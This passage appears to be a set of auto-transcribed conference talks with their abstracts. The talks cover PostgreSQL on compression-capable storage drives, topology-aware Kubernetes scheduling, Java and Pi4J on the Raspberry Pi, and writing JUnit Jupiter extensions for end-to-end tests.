the write hat log in Postgrease. We know that Postgrease applies full page write to enhance the reliability at a cost of higher write IO traffic. For write intensive workloads, this could lead to noticeable performance degradation. The idea here is that by leveraging the transparent compression, we pad zeros into the write hat log so that each AK byte full page is always aligned with the 4K byte boundary on the storage device without sacrificing the storage cost. Therefore, each AK byte full page in the write hat log spans over exactly two 4K byte sectors in the file system. Meanwhile, we can leverage the file range clone feature in file systems to clone the AK byte page from the table space into the write hat log. Although the ZFS and the BTRFS support file range clone from the very beginning, the journaling file system, XFS, only starts to support it very recently. This makes it possible to realize the full page write through the file range clone. As a result, we can eliminate the write IO traffic caused by the full page write, which not only can increase the flash memory endurance, but also improve the database performance. Okay, so conclusion. The emerging storage hardware with built-in transparent compression is a perfect match with PostgreSQL. Without changing a single line of code, PostgreSQL can benefit from such storage hardware in terms of both storage costs and performance. Moreover, if we are allowed to slightly modify the source code, there could be a much larger spectrum for PostgreSQL to take better advantage of such storage hardware. And we just present two simple ideas as examples. So at the scale flex, we sincerely look forward to working with the PostgreSQL community to explore how PostgreSQL could take full advantage of such a new computational storage drive. So this ends my talk. Thank you very much.
|
This proposed talk will present how Postgres could seamlessly and significantly benefit from replacing normal solid-state drives (SSDs) with emerging computational storage drives (CSDs). Aligned with the grand trends towards heterogeneous and near-data computing, computational storage has gained tremendous momentum and led to an on-going industry-wide effort on expanding the NVMe standard to support CSD. The first generation CSD products have built-in transparent compression, which can be deployed into existing computing infrastructure without any changes to the OS and applications. This proposed talk will discuss and present: (1) brief introduction to commercially available CSDs with built-in transparent compression, (2) experimental results that show, by replacing leading-edge normal SSD with CSD, one could reduce the storage cost by over 50% and meanwhile achieve 30% better Postgres TPS performance, and (3) experimental results that show CSD could meanwhile significantly reduce the Postgres write amplification, which enables the use of emerging low-cost QLC flash memory to further reduce the system storage cost. Finally, this proposed talk will discuss the potential of leveraging CSDs to improve the efficiency of important operations in Postgres.
|
10.5446/14104 (DOI)
|
Hello, everyone. Thanks for taking the time to attend this talk. My name is Swati Sehgal, and I'm a senior software engineer and work for Telco 5G compute team in Red Hat. My team and I have been working on enhancing Kubernetes and OpenShift to deliver leading ad solutions and innovative enhancements across the stack. Our goal is to enable customers and partners to run high throughput and latency-sensitive cloud-native networking functions on OpenShift. I've been working with engineers and stakeholders from Red Hat, Huawei, Nokia, Samsung and Intel with a goal to enable topology where scheduling in Kubernetes. And today I'm going to be talking about the work we've done on this project so far. So today's agenda includes hardware topology. I'll explain the term NOMA and why topology alignment is needed, how topology alignment can be achieved in Kubernetes. We're going to discuss topology unawareness of Kubernetes default scheduler and try to understand what leads to that and how the default scheduler works. I'll also explain a proposal of enabling topology where scheduling, the key components that we proposed, as well as the end-to-end working solution. I'll also talk about the current status and the use cases and wrap up by providing a few pointers for future reference. So let's look into the first item, hardware topology. What is NOMA and why is NOMA alignment important? NOMA stands for Non-Uniform Memory Access. It is a technology available on multi-CPU systems that allow different CPUs to access different parts of the memory at different speeds. Any memory directly connected to a CPU is considered local to that CPU and can be accessed very fast as opposed to any memory which is not directly connected to a CPU which is considered non-local. Now, on modern systems, the idea of having local versus non-local memory can be extended to peripheral devices such as NICs or GPUs. Local memory on a NOMA system is divided into a set of NOMA nodes with each NOMA node representing the local memory for a set of CPUs or devices. For example, in the figure here, CPU core 0 to 3 and devices connected to PCI bus 0 would be part of NOMA node 0. Whereas, CPU core 4 to 7 and devices connected to PCI bus 1 are part of NOMA node 1. In this example, we show a 1 to 1 mapping of NOMA node to socket. This is not necessarily true. There can be multiple sockets on a single NOMA node or an individual CPU or devices of a single socket may be connected to different NOMA nodes. Now, let's move towards why NOMA alignment is important. For performance-sensitive applications in the field of TALCO 5G, machine learning, AI and data analytics, CPUs and devices should be allocated such that they have access to the same local memory. Another example is DPTK-based networking applications which require resources from the same NOMA node for optimum performance. So the next question is what NOMA alignment means in Kubernetes context and how do we achieve NOMA alignment in Kubernetes? In order to illustrate aligned and non-aligned resource allocation, let's consider the simple scenario. Here we have a system with two NOMA cells. Let's consider a workload requesting one SRV virtual function, two CPU cores and the resources that are being aligned kind of align differently in these two scenarios. So the first diagram shows you where all the resources are aligned on the same NOMA node and this will lead to optimum performance whereas the second scenario shows whether resources are not allocated from the same NOMA node and can lead to underperformance. At a known level, topology manager, which is a Kubernetes component, coordinates the topology of resources that are allocated, this includes the resource allocation of CPUs and devices. Topology manager has flexible policies and you can define scope for different resource alignment. It orchestrates CPU manager, device manager and upcoming memory manager. It allows workloads to run in an environment which is optimized for low latency. In addition to that, it has a set of node level policies, for example, best effort, restricted, single NOMA node policy and the scope to define whether you want resource alignment at a pod level or a container level. It basically orchestrates resource managers, which I mentioned like CPU manager, device manager, by gathering hints from them and using those along with the policies to align resources, allowing workloads to run in an optimized environment for which is optimized essentially for low latency. So now that we know that topology manager takes care of resource alignment, you might ask what's the gap here? Topology unawareness of Kubernetes default scheduler. So the challenge is that the default scheduler is topology unaware. By the introduction of topology manager, enabling topology alignment of requested resources, scheduler's lack of knowledge of resource topology can lead to unpredictable application performance, in general, underperformance and in the worst case, a complete mismatch of resource requests and Kubler policies. Basically scheduling a pod where it's destined to fail, potentially entering a topology affinity error failure loop. So let's try to understand this with the help of a better example. So we have two worker nodes here, worker A and worker B, with 40 CPUs and eight devices split equally across NUMA nodes, meaning that there are 20 CPUs and four devices on each NUMA node on each worker node. In this case, both the worker nodes have been configured with single NUMA node policy, single NUMA node topology manager policy, which essentially means that all the resources should be allocated from the same NUMA node. So here we show a scenario where workloads running on the node and the resources consumed by them are distributed differently with accumulated resource consumption and hence the allocatable resources on each node is the same. So when an application requests four instances of devices and four CPUs and needs to be placed, the scheduler finds worker B as a perfectly fit candidate for scheduling the pod. However, as you see that the topology manager which has been configured with the single NUMA node policy will not be able to align the resources on a single NUMA node and the pod would end up in topology affinity error. So let's talk about how the default scheduler works. Let's try to understand the help of this diagram that I have here. So on the left we have a pod which is requesting resources. The request, the resource request as well as the pod spec goes to the API server. The scheduler gets the node object corresponding to the node that is part of the cluster. As the scheduler is essentially a controller, it looks for the pods that haven't been assigned to a node. It then runs its filtering and scoring algorithm to identify a suitable node where the pod should be placed. Once a suitable node has been identified, it updates the pod object and captures the node name where it should run. So Q-Blit of the chosen node starts provisioning resources. So for example, if it's this particular node one that has been selected, Q-Blit on that node would kick in and would start looking into resource allocation. Topology Manager is a mention which is a Q-Blit component. Starts doing its Hint calculation to identify what are the suitable resources that I can allocate and that would allow me to align all the resources. There are two possibilities. Topology Manager is able to admit the pod and the pod is up and running. In another case, the Topology Manager might be unable to admit the pod and it rejects it, which results in a topology affinity error. If the pod is part of a deployment or replica set, it results in a runaway pod creation because the subsequent pods that have been created again end up in a topology affinity error. So in order to optimize cluster-wide performance of workloads, resource utilization, and enhance the overall performance of the system as a whole, the default scheduler needs to be enhanced to increase the likelihood of a pod to land on the node where it will fit. So let's talk about the proposed solution. How do we make topology aware scheduling capability enabled in Kubernetes? So the key components of our proposal are pod resource API, node feature discovery, topology aware scheduler plugin, and node resource topology API. So let's deep dive into each of these items, try to understand them better. Pod resource API. So pod resource API is a cubelet endpoint for pod resource assignment. Pod resource API was enhanced to add support for CPUs and device topology. Additional endpoint to enable what support and obtain allocatable resource information. The second part is node feature discovery. We started working with a component called resource topology exporter with the goal to expose resource topology information through CRDs. The Kubernetes signal recommended that we try to consolidate this work in node feature discovery. Node feature discovery was already a popular project and is actually already a popular project. It is a node-precising agent which exposes hardware capabilities in the form of node labels, annotations, and extended resources. Exposing hardware topology information as CRDs was just a natural next step. So NFV basically runs as a dam set, it collects the resources allocated to running pods along with associated topology information, and gathers information, identifies what are the NUMA nodes corresponding to those resources to be able to expose CRDs, which allows us to have information as to the resources available at a NUMA node level. So topology aware scheduler plugin. This is the scheduler plugin that uses the per node CRD instance to make a NUMA aware placement decision. Node resource topology API, this is the CRD API which is used by NFD and the scheduler plugin. So essentially it acts as the glue between both these components. So now again, moving back to the example that I showed previously, we have NFD which uses the pod resource API to gather information of the allocatable resources and the NUMA nodes those allocated resources were from. And then once we determine that, we're able to expose a per NUMA allocatable resource as part of a CRD. So now when the pod, so essentially when the pod comes, it goes to the API server, the topology aware scheduler plugin uses the CRD to make a more topology aware scheduling decision. It runs a simplified version of the topology manager alignment logic to determine the node which is suitable to place the pod. Important thing to note here is that topology manager still runs its alignment logic at a node level. So after the pod has been placed on the node, again the resource allocation for the corresponding pod needs to happen and again topology manager still runs that alignment algorithm. So now circling back to the example that I had shown previously. Let's try to see what would happen when we have topology aware scheduling enabled in our cluster. So now topology aware scheduler has a more granular view of the resources on a NUMA node basis. So in this diagram here, you can clearly see that the worker A and NUMA node 1 is the one which is empty, which is represented by the data over here and it's clearly visible to topology aware scheduling to make the right decision as opposed to previously where worker B was a valid enough candidate for the workload to be placed. So again, when the same workload comes, pod which is now requesting four CPUs and four devices, the scheduler knows that worker B will fulfill this request and hence places the pod onto that node. So let's talk about the current status of this project. In terms of the pod resource API changes, the Kubernetes enhancement proposals have been merged. We have introduced device to pod G and CPU ID information as part of the pod resource API and the pull request corresponding to that has been merged. We are targeting get allocatable resources for Kubernetes 1.21 release. In terms of node feature discovery work, the resource topology enablement, the resource topology exporter, the Kubernetes enhancement proposal and the code is ready. The enhancement proposal is still being reviewed, but the code is all up and ready. We've had initial discussions with the NMD maintainers and stakeholders. We have like an issue. We have a proposal doc to capture all the design discussion in terms of how do we proceed about enabling resource hardware topology through CRDs in NMD itself. Development work is currently work in progress and the initial demo can be seen here. In terms of the topology aware scheduler plugin, the KEP and code, the code has been done. The KEP is currently still being reviewed and the node resource topology API work is still being discussed in the community. So there's some work that we need to do in terms of the value proposition to prove to the Kubernetes component community how this feature would be useful with different use cases as well as at a larger scale. Let's talk about the use cases. We've been extremely fortunate to have the opportunity to work with stakeholders and contributors from Intel, Huawei, Nokia, Samsung. We've contributed and supported this work. Here are some of the use cases that we have. We have VRan user plane, use case by Nokia, where packets need to be processed with extremely high bandwidth. Pods handling the user traffic require SRVVS, huge pages and CPU resources from the same NMD. Due to failover requirements, the scheduling of these pods need to be extremely reliable. This case from Samsung is about performance intensive high throughput network functions or networking applications for containerized 5G deployments and MEC. The cloud native networking function cluster level NUMA alignment by Intel. Where we've come across an interesting scenario, so far we've been mostly talking about full alignment of these sources. But here, Intel had raised an interesting point about having partial alignment of resources. What if you just want to align CPU and huge pages? In certain scenarios, don't care about SRVVS, for example. The fourth use case is GPU direct scheduling use case by Visat, which requires direct GPU to net transfer over PCI instead of through CPUs. For detailed information on these use cases and more such use cases, please refer to the use case dock linked here. In this document, you'd find NVIDIA's way of preventing topology affinity error. It's a very interesting read and I will highly recommend it. Finally, we have references of the documents and demos that we've worked on so far. We would really love to have more contributors. So please get involved and get in touch with us on topology where scheduling Kubernetes Slack channel. Also, you can email me or find me on Slack. Thank you very much.
|
With Kubernetes gaining popularity for performance-critical workloads such as 5G, Edge, IoT, Telco, and AI/ML, it is becoming increasingly important to meet stringent networking and resource management requirements of these use cases. Performance-critical workloads like these require topology information in order to use co-located CPU cores and devices. Despite the success of Topology Manager, aligning topology of requested resources, the current native scheduler does not select a node based on it. It's time to solve this problem! We will introduce the audience to hardware topology, the current state of Topology Manager, gaps in the current scheduling process, and prior out-of-tree solutions. We'll explain the workarounds available right now: custom schedulers, creating scheduling extensions, using node selectors, or manually assigning resources semi-automatically. All these methods have their drawbacks. Finally, we will explain how we plan to improve the native scheduler to work with Topology Manager. Attendees will learn both current workarounds, and the future of topology aware scheduling in Kubernetes. Kubernetes has taken the world by storm attracting unconventional workloads such as HPC Edge, IoT, Telco and Comm service providers, 5G, AI/ML and NFV solutions to it. This talk would benefit users, engineers, and cluster admins deploying performance sensitive workloads on k8s. Addition of newer nodes running alongside older ones in data centers results in hardware heterogeneity. Motivated by saving physical space in the data centers, newer nodes are packed with more CPUs, enhanced hardware capabilities. Exposing to use fine grain topology information for optimised workload placement would help service providers and VNF vendors too. We’ll explain numerous challenges encountered in efficiently deploying workloads due to inability to understand the hardware topology of the underlying bare metal infrastructure and scheduling based on it. Scheduler’s lack of knowledge of resource topology can lead to unpredictable application performance, in general under-performance, and in the worst case, complete mismatch of resource requests and kubelet policies, scheduling a pod where it is destined to fail, potentially entering a failure loop. Exposing cluster level topology to the scheduler empowers it to make intelligent NUMA aware placement decisions optimizing cluster wide performance of workloads. This would benefit Telco User Group in kubernetes, kubernetes and the overall CNCF ecosystem enabling improved application performance without impacting user experience.
|
10.5446/14160 (DOI)
|
Welcome in my talk, the future of Java on the Raspberry Pi here at Fosdome. Happy to be here at this virtual conference, a bit strange times, but happy that we still can share all these Java goodies. Let me introduce myself, I'm Frank Dopport, I live in Belgium, I do a lot of blogging on WebTec.be on my own blog and also on Fujie. I've been programming since I was 10 years old a long time ago and it all started with this Commodore 64, which was a great device and allowed me to already start with electronics and connect, for instance, my Lego trains with this Commodore so I could control my Lego train. I'm working at TODI as a software developer, but most of the knowledge I have about Embedded and Raspberry Pi and Arduino actually comes from CodeDojo, a computer club where we teach kids to work with computers, to program, to present what they've done, to work together, to think about IDs and how to solve certain problems. The coaches at CodeDojo bring their own knowledge to these events and that's where I first learned about Raspberry Pi and Arduino and this amazing hardware at a very low price, which allows you to do a lot of great stuff. Because I love Java, I combined all this because I wanted to create a drum boot for my son and you see it has a touchscreen, it is controlled by Raspberry Pi and Arduino for the LED strips and you can control different devices on 220 volts. This was actually my first Raspberry Pi project where I wanted to use Java and Java FX and it all led to this book where I described my whole journey, what I learned doing all this, how I started with installing Java FX on a Raspberry Pi, how the pins work, where you connect the electronic components, build for instance this small chart to show a temperature measurement or control an 8x8 LED matrix, all very cheap electronics components that you can use on the Raspberry Pi and which you can control with Java like for instance getting the weather forecast from an API and show it on a small display. Also spring works on the Raspberry Pi of course and it allows you to build rest services to control the LEDs or read the button state or store data and then of course you have this application that I used in the drum boot of my son to control a LED strip and here it even uses a Q and an Arduino to connect multiple devices like a PC and a Raspberry Pi and an Arduino and all share the same data. And as Java community is a great community with a lot of great people who are very open to communicate and to discuss certain topics, I also have a lot of interviews in the book and of course this code is shared on Hithub. Now to get to the start what is a Raspberry Pi? It's a very small PC. Everything is here, you only have to connect a screen and a monitor and a mouse and you can get started. You pop in an SD card with the operating system of your choice and you can get started. There are different types of these boards. The B is the most used one and it ranges from 40-80 euros depending on the amount of memory you want to use on the board and you have also some special versions of it or smaller depending on the use case. In 2020 they launched a new compute module and the idea of the compute module is that you embed it into your own projects with the hardware that you design around it. So the board, the compute module has all the logic and the memory and then you design a base board with all the peripherals and the connections you really need and you can buy a compute module base board for your experiments and then later replace it with your own version. Also last year they announced the Raspberry Pi 400 which actually is a keyboard with a Raspberry Pi 4 inside it and you see that you also have the connections similar to the Raspberry Pi 4 here. So it's the same Raspberry Pi with the different form factor integrated in the keyboard. And yeah, this let me think where did we see this before indeed that was the same form factor of the first PC I used also with the connector on the back to connect peripherals. The only difference if you compare it to the cost at the current prices is that the Raspberry Pi 400 is 14 times cheaper than what you paid so many years ago for the Commodore 64 and it's very, very powerful because just to compare the screen this is what I was programming in on the Commodore 64 and this is what I'm programming with the Raspberry Pi 4 4K display attached to it. I have two Visual Studio codes open. This is a screenshot while I was writing my book. So you can do a lot of real programming on a very cheap PC. A question I get asked a lot is why would you use Java on a Raspberry Pi? Wasn't it designed for Python? Well actually yes it was when they designed the board they were looking for a fruity name and that's where the Raspberry Pi comes from and they added Pi from the Python language that they were using at that time also from the number Pi of course but it could also have been the Raspberry Java or something like that because Java works just as well. And definitely now that Java is evolving so fast with all these releases every six months a lot of improvements get added but also features which make it more powerful to use it on a Raspberry Pi or other cheap electronic components. And even Oracle thought this is a match made in heaven. I wrote an article for the Oracle Java newsletter describing a first project you can make on the Raspberry Pi with some electronic components and all the code of course and it was one of the most liked and retweeted tweets of last summer because indeed this cheap hardware allows a lot of new people to get into programming and use the language of their choice on any platform. Now if you start with a new Raspberry Pi board and you flash an operating system to an SD card you can download it from the Raspberry Pi website with their imager tool and it's a full Linux system based on Debian 32-bit and if you go for the full version you have OpenGDK 11 pre-installed on it so you can immediately start with any Java project. There is a so it also included in this full Raspberry Pi OS as it's rebranded only recently you see that there is a lot of tools pre-installed not visual studio code but you can install it from their website there is a version available built for the Raspberry Pi and the ARM processor and there is also a 64-bit version because there is already a proof of concept work in progress version of that operating system for 64 bits as the processor allows it. If you install visual studio code and the Java extension pack which all runs without any issue on the Raspberry Pi you can make any Java application on this board. So as I said Java is pre-installed so if you power your Pi for the first time and you do a Java version request you will see that you have version 11 there available. If you want to use Java evix if you want to make a user interface you have two choices either you select GDK which has Java evix included as it's no longer included since Java 11 but some of the GDK providers have versions where Java evix is integrated again Liberica from Bell Software is one choice and it's the approach I took in the book because it allows you to test and develop very easily without any extra configurations. So we just downloading the GDK from their website configure it and then you see for instance that this is version 13 from Bell Software. But there is also another approach of course because Java evix is a standalone project it has the same release cycle as Java so two new versions each year and it's all powered by Gluon who maintain this project and they also provide the build version. So you can find on their website an open GFX version also again specifically for the Raspberry Pi. The only thing you need to do then is either configure it in your EDA and on the Raspberry Pi give some additional startup commands if you start your application. But this allows you to use the latest features which are added by Gluon and the community in this open GFX project. So for instance if you look into the screenshot that's Java evix 16 running on the Raspberry Pi with Java 11 so you can combine this with any problems there is no dependency between the latest GFX and the later Java GDK they can live on their own and you can use the version that you want. And the latest versions of Java evix have specific Raspberry Pi improvements for direct rendering on the screen and have a much more smoother playback for instance. If you look at this example which is a video from Gerrit Grunwald who created this base evix game so yes indeed it's a Java evix game and it's running on the Raspberry Pi at almost 60 frames per second you see it's very very very smooth. I've done some experiments myself one of them is with Java evix 3d it was something really new for me I never used it before. This is one of the very first examples used to demonstrate Java evix 3d many years ago and you see that it runs very smooth so it's an application which draws a molecule and you can control it with some keys and this is running on the Raspberry Pi of course. Another example is with evix gel which is a gaming engine that you can use inside Java evix to build games and I've used this just for some kind of performance test so you have 30 dots moving at a random interval at a random location and without any improvements within the evix gel project yet we already have these 30 frames per second for very smooth animations and also there is some improvements ongoing. Now an additional feature of the Raspberry Pi is of course the header these 40 pins where you can connect hardware like LEDs and buttons but also a lot more complicated devices. To know what's inside these headers I created a small Java library which you can find in the Maven repository which explains where the pins are located and with Java evix I created a small demo application so for instance the latest Raspberry Pi's they have a 40 pin header and here you see it visualized what output they have for instance a 3.3 volt or a 5 volt or they are a ground or they are a GPIO and a GPIO is to connect your devices and which numbers then to use into your program and some of these pins have specific functions so all this is explained here or visualized and you can find it very easily what you can use them for. So a GPIO it's a 1 or a 0 it's true or a false if you look into coding but for electronics that means it's a 3.3 volt on the Raspberry Pi if it's a 1 or a 0 is 0 volt meaning a high or low state for electronics or an on-on or off for a LED and as you can see there are some very handy extensions boards that you can stack on top of these pins also again to find back the right number to use into your program and on these pins you can connect any kind of devices the easy ones or a LED and a button but of course you can go a lot further and control a chip for a LED number or an 8 by 8 LED matrix or serial communication there are different types of communication protocols available that you can use to control these electronics. Now let's look into a simple experiment where we have this button and a LED so we connect the LED to one of the GPIOs to put it on and off and we connect a button to read the state if it's pressed or if it's not pressed. By the way as you've seen in this wiring diagram there is a resistor connected to the LED because the output is 3.3 but the LED normally has a lower or needs a lower voltage or otherwise you burn it so that's where we have this resistor for and there is an app for that of course to calculate which resistor to use and one of these apps was created by me together with gluon just to show you how you can create a mobile application with javafx and use github actions to make an executable out of it a native executable using grau.vm for all operating systems being windows mac linux just an application and then apps for the app store for google and apple and they are all built on github with actions and even pushed to the app stores it's not part of this app presentation but you can read all about it on my blog or on fuji and all the code is of course available and shared on github to show you how easy this is to do. Now we've seen that we in this wiring diagram that we have connected a LED now the LED is connected to GPIO 22 and the button is connected to GPIO 24 and now we can start using them and control them from our Raspberry Pi this is how it looks with some breadboards which are very easy if you start experimenting with electronics to set up an experiment very easy and fast. Now first we're going to test if this works from the terminal we can just toggle configure one of the GPIOs to be an out mode and then we can send a 1 or a 0 and toggle this LED and you see this is very easy to do from the terminal of course and we can also do the same with the button and we can read the state of the button so we say that we want to use this GPIO as an input pin and then we can read it and it's a 0 when it's not pressed and as soon as we press it and we read it again it is a 1. Now if you want to do this from Java we can take the easy approach and the dumb approach let's say and just use Java no dependencies no imports we're just going to reuse that terminal command that we've just seen and executed from Java and that's something we can do with runtime exec and as you can see in this code so we just say we want to have this GPIO mode 3 as an output pin and then we toggle it on and off 10 times in this loop and then we have this very simple Java code. Now because we have Java 11 pre-installed on our Raspberry Pi we don't need to compile it so we have this script here and we can just run it with Java so if we run Java with this Java file in the background it actually will compile it I think but we just give the Java file we wait a little bit and then we get the result of this application and as you see and expected this let turns on and off. Now let's make this a real Java project a Maven project even and include Py4j. Py4j is a library to connect these GPIOs to software to Java software so it's either it's on one side it's a library which integrates into your Java application and it uses native libraries to interface with the hardware and give you access to all these communication protocols and what you can do with these pins. Now there is a Py4j version already existing for a long time and the latest one was 1.2 which was released in 2019 but since then a lot has evolved because we had the new Raspberry Pi versions and then some changes in the native libraries so there are some changes scheduled so there will be a version 1.3 and 1.4 which support Java 8 and Java 11 but there are some problems with this project on one side there is a lot of device support included in this project which makes it very difficult to maintain and to release new versions and to test all the features and maybe the biggest problem is the wiring Pi this native library which is used to control these GPIOs it has been deprecated last year and there were also a lot of confusions when people started using this library because wiring Pi uses another numbering for these GPIO pins than most other libraries and projects where you have the BCM numbering you can use them but it caused a lot of confusion. Now let's look at some of the codes if you are still using this version of Py4j it's very easy just to initiate a controller and then let is just provision an output pin give it the right pin number give it the name and then you can just turn a let on and off high and low with some commands and something similar can be done with a button and then we can give it can give it a change event listener so we are really coming into the Java code and how we are used to do Java and a change event listener can then do something with the events when the button is pressed or released and in this case we are just storing when a button was pressed. Now if you then look into this project and this is the project which was also fully described in the article Java newsletter you can see that you from the screen can toggle this let if you read the button of click the button and then you see on the lower graph that a line is drawn because we just store the timestamps when the button is stored and we even have another distance sensor attached to this Raspberry Pi and you see in the upper chart that every second the distances measured and visualized also in a graph. So this is a very basic example to show you how to use Py4j and it's a touchscreen by the way so you can also do it from the screen itself. Now what's the future for Py4j and that's something very something where we're very looking forward to it's a version to complete rewritten and redesigned architecture of this framework which is fully Java 11 modular and it will support all Raspberry Pi boards because there is a new native library being used it's PyGPIO instead of firing Py which is not created of course well very well maintained and has a large community behind it and there was also a choice made to reduce the code base and remove all this device support and the example projects they are now on GitHub as separate projects which will make it a lot more easy to extend this library, maintain it, test it and then have these separate projects and examples live on their own and they can have their own release cycle if something has to be changed in there. But it's working progress and it's definitely something we want to push forward in 2021 and make a first release of it but it's already there you can already start using it so you already have this website which fully describes it we are working on the examples and about this PyGPIO so it's a new native library being used and also this library is replaceable again as it is a module inside the project and it uses also the BroadCop numbering so removing this confusion of the numbering schemes. This is the architecture of the Py4j version 2 library where you see that everything becomes module is separated and we make it a lot more clear to maintain and also people who want to join this project can find very easily where they want to modify or fix something. Again let's show you a minimal example with the same thing a button and let it is fully described on this version 2 website. Initializing Py4j version 2 is creating a new auto context this will automatically detect which platform you are using which provider is available. There are other initializers available where you can configure more yourself but this will be the perfect starting point for every new project and a button for instance an input it's a bit a different way of configuring it but it's also the more modern approach of Java and how you define objects and configure objects. Again here we have a listener and in this case the listener just has a counter for the number of times a button is pressed. Let's the same ways configuring with all the options you need in your use case and in this case we toggle it between let high and low on a different speed depending on the number of press counts. Because this is using Java 11 and the module approach if you package such a project you get a distribution directory with all the modules that you need for your project which makes it very easy to install it on a Raspberry Pi and only update those modules that you are changing during the lifetime of your project. And our Maven configuration will also add a run script for you that you have everything available to just start it. So if you want to get started and experiment with this you have this GitHub project the Pi 4j minimal example you can just clone it build it on your Raspberry Pi and run it and if you have connected the hardware as in the diagram you will see them blinking let and can read the button. Now what did we learn is that Java and Java on the Raspberry Pi they just work. I find Java really amazing tool to build user interfaces which are great looking easy to configure easy to extend easy to program and of course easy to combine with electronics and that's where the fun starts if you combine this with your Java knowledge and you want to learn more about this electronics or maybe you're an electronics expert and want to start doing some software with it then this is a great starting point and as always with Java by selecting the right dependencies and using existing projects and libraries you can create amazing applications with minimal code. And there is a lot to look forward to so we have this native support crowd VM is also coming to the Raspberry Pi 2 32 bit. We have this version 2 coming of Pi 4j which will make it even more easy to have Java and electronics combined. We have Java evicks evolving a lot and being very performant and fast on the Raspberry Pi. Now what's next if you want to learn more visit the Pi 4j website my blog fooj of course has a full category for the Raspberry Pi and of course build experiment and have fun that's only one thing I can advise you to do. If there are questions I'm here in the chat to answer them if you do some experiments and want to share them tweet them on send them on Twitter with the hashtag Java on Raspberry Pi and if you want to read more visit my blog fooj or the book. Thanks a lot and have fun.
|
Java on the Raspberry Pi is still a controversial topic, but recent evolutions of both the JDK and OpenJFX have proven they are a perfect match! In this talk we will look into some examples and discuss what could be the next steps. We will take a look at the current state of Java, JavaFX, and Pi4J on the Raspberry Pi. Still, most Java developers didn't consider the Raspberry Pi yet to be the perfect board to run their applications, but with its low price but high specifications, the Raspberry Pi is opening whole new worlds.
|
10.5446/52795 (DOI)
|
Hi to all, this is Kaleinsmoves speaking with a lecture about JUnit Jupiter extensions writing and turn tests. If you like to contact me, you can do that via Twitter, via GitHub or via email. Take a look on this slide. So some words about me. I'm working as a German freelancer, working with different technologies like Java, Ducca, Jenkins, Spring Mode and so on, as you see on the slide. So the agenda for this lecture is about the example application. We would like to enter and test how it looks like and so on. Then we will see how JUnit Jupiter platform looks like, how to use it. Writing some unit tests with JUnit Jupiters, what are the details here and what is needed or not. And then finally we start with the running end to end tests, what is needed to do some real end to end testing. And then we start writing an extension with JUnit Jupiters to run those end to end tests. And finally we have a Q&A session. At the beginning we need some example application which we like to do some end to end testing on. I have decided to use a Spring Mode application, very simple one of course, for simple purposes, has two REST API, end points and things like that and writes to a database. In this case I am using a Postgres database and we will take a look into the code later. Just going to the code now. So here in the code we are starting with the Spring Mode application, main application part, which is very, very simple here in this case. We have two controllers here, we have a simple Hello World controller, call it Hello Controller, very easy. Then we have an employee controller, we have two different end points, one which is create and one which is lists. The first one create will create with each call, with each post call, a single entry into the database. Where the lists endpoint will just list all the entities which are existing in the database. So this is the connection to an external service which we need to run our application here. We have of course our employee entity defined, it's very easy, very simple, very basic, nothing fancy here at the moment. So we are starting that and we have now an application. I have to decide a little bit larger project which comprises of three different modules, application E2E and extension. About E2E and extension we will talk about later and now we will start and take a look at how the JUnit Jupiter platform looks like. So now we are taking a brief look into the architecture of JUnit Jupiter platform which comprises of two parts here in general. There is an engine, usually the JUnit Jupiter engine in the middle, written in green, and the platform. Those two parts are communicating with which it's other. So we have the JUnit Jupiter engine which is responsible for finding tests, identifying what a test is and how it looks like and then give back the information to the platform which then uses the engine, the platform runner to execute the tests. This decouples completely the IDEs and build to's from the identification of tests and finding out what a test is. Sometimes it's useful or necessary to filter out some of the found tests but based on particular filtering criteria that can be done as well and then you have a complete decoupling via the platform from the engine and your real tests. If you take a look on the left side you see the vintage engine which is responsible for running the JUnit4 tests and identifying them of course and that means you can combine JUnit4 and JUnit5 tests into a single project which is possible, very convenient for migration from JUnit4 to JUnit5 only tests. So on the right side you see another option that you can implement your own test engine, identify tests and things like that and if you have done that correctly via the interfaces which are existing in JUnit platform then you have automatically integration into your IDE and build tools without supplemental implementation. So that makes it very easy and very comfortable to use that engine. First of the time you don't need to implement your own engine but it is possible here. So going to unit test. Okay into the unit test. So we have here a simple unit test which contains two unit tests like first test and second test which are annotated with the appropriate test annotation. So sometimes it happens that you need to do before each test something set up something or initialize something. That can be done and simply achieved by using it before each annotation with an appropriate method. If you need to do something going down after that you have to use after each with the appropriate method. If you have a necessary set up to be done before all the tests only once then you can use before all which needed to be a static method based on the part that the instantiation of the test class in this case the standard test class is done for each test separately. So you have to do that into before all or after all if you're going down with something like that. So that would be the first. So now let's assume and think about what is needed to do run really end to end test. We have to start all the parts which are needed for our application for example a database or Redis or something like that. Then we have to of course start the application itself. Then we need to do the testing whatever we do accessing the database accessing rest end points or whatever. And then of course finally we need to shut down the application itself. And last we have to shut down the other parts like the database or Redis or whatever we are using here. Okay now let us translate these steps into real annotations which are used by JNitubitor. You see the part before each we need to start up all the components start up the application. Then doing the test in the real test method which is annotated via a test of course. Then after each we have to shut down the application and shut down all the components we have. If we think about that approach it becomes clear that you are writing a lot of code inside your before each and in your after each method for starting up the application for starting up the dependencies like database like Redis or something like that. And for the after each method as well. So it becomes not very clear where the real test code is and it is a little bit cluttering the test cloud with application components set up shut down code and so on. But on the other hand it is very easy to do so. So we might think of a better approach here. A good solution could be using JNitubit's opportunity to do some so called extensions. JNitubit has a lot of extension points where you can intercept different calls of different methods for example the before each, after each, before test or something like that. Let us take a look on a more clear diagram. So if you take a look here in a simplified order of the calling you have different calls like before all callback or before each callback or before test execution callback and then the parts which are marked orange here. That means the before all callback method is called before the before all of the user code. And furthermore the before each callback is called before the before each call of the user code in your test. So we can intercept these different points here and get an interception into that and for example start with an before each callback and start our application for example and the needed parts here. And in the after each callback we can do the same thing here and say we stopped our application and the needed parts. So that's the way we will go and we will start with that and you will see to go via an extension which is using these things here. So now we are in the code. I'm starting with the example of my end to end test as an example. Here you see the test method which I have defined and which is usually annotated with the add test annotation. But you see also an annotation which you can't be familiar with because I have defined it on my own. This is the e2e test annotation which I have defined here for running these end to end tests here. That looks like this here and usual annotation part where I'm allowed to put that. And a very important thing here is this is the part where to enter the area of junit. This is the definition of a class which we can look at. Sorry, just go back and then you see the class which I have using here is e2e extension. We are starting with defining some callback interfaces here. Let's start with a before each callback. That's simply an interface which contains only a single method which is the end to point before each as we've seen on the previous slide. If we take a look how it is implemented here, we start with the database container as described in our lectures here. Then we start our application in several ways here. I will explain that later in more detail. Then start up and wait until it's started up. The same thing we have to do is to down the application which is done by using the after each callback here. After each, then we stop the database here. This could be much more than just only as database that you can use and stop any of the components you have used here. And then I'm ready with that. So let us start that on the command line first and see how it works. That will take a few seconds 